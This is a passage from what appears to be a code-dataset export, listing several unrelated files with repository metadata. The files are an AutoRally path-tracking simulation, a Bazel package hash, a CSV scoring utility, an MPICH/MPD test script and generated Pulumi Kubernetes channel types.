u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = arcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
psi_ref = params["psi_ref"]
x_ref = t * params["v_ref"] * np.cos(psi_ref)
y_ref = t * params["v_ref"] * np.sin(psi_ref)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_ylim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_xlim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_aspect("equal")
# psi_err_path = x_sim[:, :, arcar.PSI_E].cpu().squeeze().numpy()
# delta_path = x_sim[:, :, arcar.DELTA].cpu().squeeze().numpy()
# v_err_path = x_sim[:, :, arcar.VE].cpu().squeeze().numpy()
# ax1.plot(t[:t_final], y_err_path[:t_final])
# ax1.plot(t[:t_final], x_err_path[:t_final])
# ax1.plot(t[:t_final], psi_err_path[:t_final])
# ax1.plot(t[:t_final], delta_path[:t_final])
# ax1.plot(t[:t_final], v_err_path[:t_final])
# ax1.legend(["y", "x", "psi", "delta", "ve"])
ax2 = axs[1]
plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
# x_sim[:t_final, :, :AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
x_sim[:t_final, :, :4].squeeze(),
# label="Tracking Error x-y-psi",
label=[
"SXE",
"SYE",
"PSI_E",
"DELTA",
],
)
ax3.plot(
t[:t_final],
# x_sim[:t_final, :, :AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
x_sim[:t_final, :, 7:].squeeze(),
# label="Tracking Error x-y-psi",
label=[
"VY",
"PSI_E_DOT",
],
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
def plot_autorally_circle_path():
"""Test the dynamics of the kinematic car tracking a circle path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": 10.0,
"omega_ref": 0.5,
}
dt = 0.01
arcar = AutoRally(params, dt)
upper_u_lim, lower_u_lim = arcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 20.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = arcar.goal_point.clone()
start_x[:, AutoRally.SYE] = 1.0
start_x[:, AutoRally.SXE] = -1.0
x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = arcar.u_nominal(x_current)
for dim_idx in range(arcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Get the path parameters at this point
psi_ref[tstep] = dt * params["omega_ref"] + psi_ref[tstep - 1]
pt = copy(params)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = arcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_aspect("equal")
ax2 = axs[1]
plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, : AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
def plot_autorally_s_path(v_ref: float = 10.0):
"""Test the dynamics of the kinematic car tracking a S path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": v_ref,
"omega_ref": 0.0,
}
dt = 0.01
arcar = AutoRally(params, dt)
upper_u_lim, lower_u_lim = arcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 10.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = arcar.goal_point.clone()
start_x[:, AutoRally.SYE] = 1.0
start_x[:, AutoRally.SXE] = -1.0
x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
pt = copy(params)
for tstep in tqdm.trange(1, num_timesteps):
# Get the path parameters at this point
omega_ref_t = 1.0 * np.sin(tstep * dt) + params["omega_ref"]
psi_ref[tstep] = dt * omega_ref_t + psi_ref[tstep - 1]
pt = copy(pt)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
pt["omega_ref"] = omega_ref_t
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = arcar.u_nominal(x_current, pt)
for dim_idx in range(arcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = arcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
# ax1.set_aspect("equal")
ax2 = axs[1]
plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, : AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
# Return the maximum tracking error
tracking_error = x_sim[:, :, : AutoRally.PSI_E + 1]
return tracking_error[:t_final, :, :].norm(dim=-1).squeeze().max()
if __name__ == "__main__":
# plot_autorally_straight_path()
# plot_autorally_circle_path()
plot_autorally_s_path()
| 31.52619 | 83 | 0.566045 | 1,961 | 13,241 | 3.557369 | 0.09434 | 0.036124 | 0.029243 | 0.014192 | 0.8793 | 0.866686 | 0.853928 | 0.834002 | 0.811353 | 0.793865 | 0 | 0.021601 | 0.286761 | 13,241 | 419 | 84 | 31.601432 | 0.717069 | 0.154293 | 0 | 0.780952 | 0 | 0 | 0.037749 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 1 | 0.012698 | false | 0 | 0.019048 | 0 | 0.034921 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
005768c2f9257aa510939f7639194f8ee9642f38 | 127 | bzl | Python | debian/ssh.bzl | Ewpratten/frc_971_mirror | 3a8a0c4359f284d29547962c2b4c43d290d8065c | [
"BSD-2-Clause"
] | null | null | null | debian/ssh.bzl | Ewpratten/frc_971_mirror | 3a8a0c4359f284d29547962c2b4c43d290d8065c | [
"BSD-2-Clause"
] | null | null | null | debian/ssh.bzl | Ewpratten/frc_971_mirror | 3a8a0c4359f284d29547962c2b4c43d290d8065c | [
"BSD-2-Clause"
] | null | null | null | files = {
"openssh-client_6.7p1-5+deb8u8_amd64.deb": "50bf902cc680fd1442556325e47d892f24621d7f0c4baf826f298d737a1e8030",
}
| 31.75 | 114 | 0.811024 | 10 | 127 | 10.1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.452991 | 0.07874 | 127 | 3 | 115 | 42.333333 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0.811024 | 0.811024 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
008d8645bb7482e5e95a9d990a24bd6271395ae4 | 2,703 | py | Python | edi/util/utils.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | 2 | 2020-04-09T13:04:25.000Z | 2021-09-24T14:17:26.000Z | edi/util/utils.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | null | null | null | edi/util/utils.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | 3 | 2019-09-20T20:49:54.000Z | 2021-09-02T17:33:47.000Z | import csv
import gzip
def readRecord(header,row):
uuid = row[0]
record = {h : v for (h,v) in zip(header,map(lambda x: int(x),row[1:]))}
return (uuid,record)
class BatchProcessor:
def __init__(self,input_file, output_file, model_name, mk_model):
self.input_file = input_file
self.output_file = output_file
self.model_name = model_name
self.mk_model = mk_model
def create_model(self,csv_file):
reader = csv.reader(csv_file)
header = next(reader)[1:]
print('Scoring batch using %s' % self.model_name)
score_header = 'Object_ID,%sScore\n' % self.model_name
m = self.mk_model(header)
for row in reader:
(uuid,record) = readRecord(header,row)
m.update(record)
return (m,score_header)
def write_scores(self,csv_file,score_file,m,score_header):
reader = csv.reader(csv_file)
header = next(reader)[1:]
score_file.write(score_header)
for row in reader:
(uuid,record) = readRecord(header,row)
score = m.score(record)
score_file.write("%s, %f\n" % (uuid,score))
def process(self):
if self.input_file.endswith('.gz'):
with gzip.open(self.input_file,'rt') as csv_file:
(m,score_header) = self.create_model(csv_file)
with gzip.open(self.input_file,'rt') as csv_file, open(self.output_file,'w') as score_file:
self.write_scores(csv_file,score_file,m,score_header)
else:
with open(self.input_file,'rt') as csv_file:
(m,score_header) = self.create_model(csv_file)
with open(self.input_file,'rt') as csv_file, open(self.output_file,'w') as score_file:
self.write_scores(csv_file,score_file,m,score_header)
class StreamProcessor:
def __init__(self,input_file, output_file, model_name, mk_model):
self.input_file = input_file
self.output_file = output_file
self.model_name = model_name
self.mk_model = mk_model
def handle_stream(self,csv_file,score_file):
reader = csv.reader(csv_file)
header = next(reader)[1:]
print('Scoring stream using %s' % self.model_name)
score_header = 'Object_ID,%sScore\n' % self.model_name
m = self.mk_model(header)
score_file.write(score_header)
totalscore = 0.0
for row in reader:
(uuid,record) = readRecord(header,row)
score = m.score(record)
totalscore = totalscore + score
m.update(record)
score_file.write("%s, %f\n" % (uuid,score))
print("Total score: %f Entropy: %f" % (totalscore, totalscore/m.n))
def process(self):
if self.input_file.endswith('.gz'):
with gzip.open(self.input_file,'rt') as csv_file, open(self.output_file,'w') as score_file:
self.handle_stream(csv_file,score_file)
else:
with open(self.input_file,'rt') as csv_file, open(self.output_file,'w') as score_file:
self.handle_stream(csv_file,score_file)
| 29.703297 | 94 | 0.718831 | 438 | 2,703 | 4.200913 | 0.148402 | 0.068478 | 0.084783 | 0.052174 | 0.825 | 0.790217 | 0.790217 | 0.775 | 0.775 | 0.722283 | 0 | 0.00303 | 0.145394 | 2,703 | 90 | 95 | 30.033333 | 0.793506 | 0 | 0 | 0.724638 | 0 | 0 | 0.055165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115942 | false | 0 | 0.028986 | 0 | 0.202899 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
00cc81d90f05f0aa6f08eceb82ada9653fc7ff71 | 4,712 | py | Python | src/pm/mpd/test/test3.py | raffenet/mpich-CVS | 2d33e2742e8c00db4f56a373fea051cc6c0ee0d0 | [
"mpich2"
] | 1 | 2021-11-11T15:42:30.000Z | 2021-11-11T15:42:30.000Z | src/pm/mpd/test/test3.py | grondo/mvapich2-cce | ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb | [
"Intel",
"mpich2",
"Unlicense"
] | null | null | null | src/pm/mpd/test/test3.py | grondo/mvapich2-cce | ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb | [
"Intel",
"mpich2",
"Unlicense"
] | null | null | null | #!/usr/bin/env python
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be chgd simply by altering its value(s)
# for one or more of:
# PYEXT, NMPDS, HFILE
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "mpi tests---------------------------------------------------"
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
MPIDir = "/home/rbutler/mpich2"
# test: cpi
print "TEST cpi"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 of 3','Process 1 of 3','Process 2 of 3']
rv = mpdtest.run(cmd="mpiexec%s -n 3 %s/examples/cpi" % (PYEXT,MPIDir),
grepOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawn1
print "TEST spawn1"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawn1" % (olddir,PYEXT), # -n 1
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawn2
print "TEST spawn2"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawn2" % (olddir,PYEXT), # -n 1
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnmult2
print "TEST spawnmult2"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 2 spawnmult2" % (olddir,PYEXT), # -n 2
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnargv
print "TEST spawnargv"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawnargv" % (olddir,PYEXT), # -n 2
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnintra
print "TEST spawnintra"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawnintra" % (olddir,PYEXT), # -n 2
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: namepub
print "TEST namepub"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 namepub" % (olddir,PYEXT), # -n 2
grepOut=1, expOut=expout )
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
| 31.413333 | 77 | 0.641129 | 750 | 4,712 | 4.009333 | 0.154667 | 0.065181 | 0.083804 | 0.08846 | 0.768208 | 0.761556 | 0.761556 | 0.761556 | 0.761556 | 0.761556 | 0 | 0.022177 | 0.167445 | 4,712 | 149 | 78 | 31.624161 | 0.744328 | 0.10399 | 0 | 0.827869 | 0 | 0 | 0.345797 | 0.013337 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.122951 | null | null | 0.07377 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
00f1962d173a14d61e349b9462dab76b18709947 | 141,249 | py | Python | operators/multicluster-operators-subscription/python/pulumi_pulumi_kubernetes_crds_operators_multicluster_operators_subscription/apps/v1/outputs.py | pulumi/pulumi-kubernetes-crds | 372c4c0182f6b899af82d6edaad521aa14f22150 | [
"Apache-2.0"
] | null | null | null | operators/multicluster-operators-subscription/python/pulumi_pulumi_kubernetes_crds_operators_multicluster_operators_subscription/apps/v1/outputs.py | pulumi/pulumi-kubernetes-crds | 372c4c0182f6b899af82d6edaad521aa14f22150 | [
"Apache-2.0"
] | 2 | 2020-09-18T17:12:23.000Z | 2020-12-30T19:40:56.000Z | operators/multicluster-operators-subscription/python/pulumi_pulumi_kubernetes_crds_operators_multicluster_operators_subscription/apps/v1/outputs.py | pulumi/pulumi-kubernetes-crds | 372c4c0182f6b899af82d6edaad521aa14f22150 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'ChannelSpec',
'ChannelSpecConfigMapRef',
'ChannelSpecGates',
'ChannelSpecGatesLabelSelector',
'ChannelSpecGatesLabelSelectorMatchExpressions',
'ChannelSpecSecretRef',
'DeployableSpec',
'DeployableSpecDependencies',
'DeployableSpecOverrides',
'DeployableSpecPlacement',
'DeployableSpecPlacementClusterSelector',
'DeployableSpecPlacementClusterSelectorMatchExpressions',
'DeployableSpecPlacementClusters',
'DeployableSpecPlacementPlacementRef',
'DeployableStatus',
'HelmReleaseRepo',
'HelmReleaseRepoConfigMapRef',
'HelmReleaseRepoSecretRef',
'HelmReleaseRepoSource',
'HelmReleaseRepoSourceGithub',
'HelmReleaseRepoSourceHelmRepo',
'HelmReleaseStatus',
'HelmReleaseStatusConditions',
'HelmReleaseStatusDeployedRelease',
'PlacementRuleSpec',
'PlacementRuleSpecClusterConditions',
'PlacementRuleSpecClusterSelector',
'PlacementRuleSpecClusterSelectorMatchExpressions',
'PlacementRuleSpecClusters',
'PlacementRuleSpecPolicies',
'PlacementRuleSpecResourceHint',
'PlacementRuleStatus',
'PlacementRuleStatusDecisions',
'SubscriptionSpec',
'SubscriptionSpecHooksecretref',
'SubscriptionSpecOverrides',
'SubscriptionSpecPackageFilter',
'SubscriptionSpecPackageFilterFilterRef',
'SubscriptionSpecPackageFilterLabelSelector',
'SubscriptionSpecPackageFilterLabelSelectorMatchExpressions',
'SubscriptionSpecPackageOverrides',
'SubscriptionSpecPlacement',
'SubscriptionSpecPlacementClusterSelector',
'SubscriptionSpecPlacementClusterSelectorMatchExpressions',
'SubscriptionSpecPlacementClusters',
'SubscriptionSpecPlacementPlacementRef',
'SubscriptionSpecTimewindow',
'SubscriptionSpecTimewindowHours',
'SubscriptionStatus',
'SubscriptionStatusAnsiblejobs',
'SubscriptionStatusStatuses',
'SubscriptionStatusStatusesPackages',
]
@pulumi.output_type
class ChannelSpec(dict):
"""
ChannelSpec defines the desired state of Channel
"""
def __init__(__self__, *,
pathname: str,
type: str,
config_map_ref: Optional['outputs.ChannelSpecConfigMapRef'] = None,
gates: Optional['outputs.ChannelSpecGates'] = None,
insecure_skip_verify: Optional[bool] = None,
secret_ref: Optional['outputs.ChannelSpecSecretRef'] = None,
source_namespaces: Optional[Sequence[str]] = None):
"""
ChannelSpec defines the desired state of Channel
:param str pathname: For a `namespace` channel, pathname is the name of the namespace; For a `helmrepo` or `github` channel, pathname is the remote URL for the channel contents; For a `objectbucket` channel, pathname is the URL and name of the bucket.
:param str type: ChannelType defines types of channel
:param 'ChannelSpecConfigMapRefArgs' config_map_ref: Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
:param 'ChannelSpecGatesArgs' gates: Criteria for promoting a Deployable from the sourceNamespaces to Channel.
:param bool insecure_skip_verify: Skip server TLS certificate verification for Git or Helm channel.
:param 'ChannelSpecSecretRefArgs' secret_ref: For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
:param Sequence[str] source_namespaces: A list of namespace names from which Deployables can be promoted.
"""
pulumi.set(__self__, "pathname", pathname)
pulumi.set(__self__, "type", type)
if config_map_ref is not None:
pulumi.set(__self__, "config_map_ref", config_map_ref)
if gates is not None:
pulumi.set(__self__, "gates", gates)
if insecure_skip_verify is not None:
pulumi.set(__self__, "insecure_skip_verify", insecure_skip_verify)
if secret_ref is not None:
pulumi.set(__self__, "secret_ref", secret_ref)
if source_namespaces is not None:
pulumi.set(__self__, "source_namespaces", source_namespaces)
@property
@pulumi.getter
def pathname(self) -> str:
"""
For a `namespace` channel, pathname is the name of the namespace; For a `helmrepo` or `github` channel, pathname is the remote URL for the channel contents; For a `objectbucket` channel, pathname is the URL and name of the bucket.
"""
return pulumi.get(self, "pathname")
@property
@pulumi.getter
def type(self) -> str:
"""
ChannelType defines types of channel
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="configMapRef")
def config_map_ref(self) -> Optional['outputs.ChannelSpecConfigMapRef']:
"""
Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
"""
return pulumi.get(self, "config_map_ref")
@property
@pulumi.getter
def gates(self) -> Optional['outputs.ChannelSpecGates']:
"""
Criteria for promoting a Deployable from the sourceNamespaces to Channel.
"""
return pulumi.get(self, "gates")
@property
@pulumi.getter(name="insecureSkipVerify")
def insecure_skip_verify(self) -> Optional[bool]:
"""
Skip server TLS certificate verification for Git or Helm channel.
"""
return pulumi.get(self, "insecure_skip_verify")
@property
@pulumi.getter(name="secretRef")
def secret_ref(self) -> Optional['outputs.ChannelSpecSecretRef']:
"""
For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
"""
return pulumi.get(self, "secret_ref")
@property
@pulumi.getter(name="sourceNamespaces")
def source_namespaces(self) -> Optional[Sequence[str]]:
"""
A list of namespace names from which Deployables can be promoted.
"""
return pulumi.get(self, "source_namespaces")
